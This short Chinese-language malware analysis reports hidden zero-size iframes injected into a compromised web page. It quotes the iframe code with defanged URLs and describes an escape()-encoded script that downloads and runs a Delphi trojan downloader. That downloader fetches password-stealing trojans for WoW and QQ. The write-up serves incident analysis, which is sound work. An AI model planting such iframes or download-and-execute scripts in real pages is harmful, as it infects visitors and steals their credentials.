网页首部被两次加入代码:
/--------- <iframe height=0 width=0 src="hxxp://ip-i*e.www***113.cnidc.cn/wm**/"></iframe> ----------/
wm**.htm (Kaspersky 报为 Trojan-Downloader.VBS.Psyme.cy) 的内容为 escape( ) 加密的代码,解密后的内容为一段 JavaScript 编写的 脚本程序,在这之前遇到的此类脚本代码都是用 VBScript编写的,不过都利用 Microsoft.XMLHTTP、Adodb.Stream 下载 1.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。
1.exe 采用 Borland Delphi开发,文件长度为 15.5 KB (15,872 字节),Kaspersky 报为 Trojan-Downloader.Win32.Small.dwu,瑞星报为 Trojan.DL.Agent.wzr。
1.exe会从同一网站下载文件:
1)wow.exe(瑞星报为 Trojan.PSW.WoWar.lr)
2)qq.exe(使用的是JPG图片图标,Kaspersky 报为 Trojan-PSW.Win32.QQRob.iw,瑞星报为 Trojan.PSW.QQRobber.ajv)
从另一网站下载文件:
1)1234.exe(Kaspersky 报为 Trojan-PSW.Win32.WOW.le,瑞星报为 Trojan.PSW.Element.c)
2)4321.exe
网页末尾还有代码:
/--------- <iframe src="hxxp://bbs.geme***us.com/m1*3/index*.htm"width="0" height="0"></iframe> ---------/
似已失效。
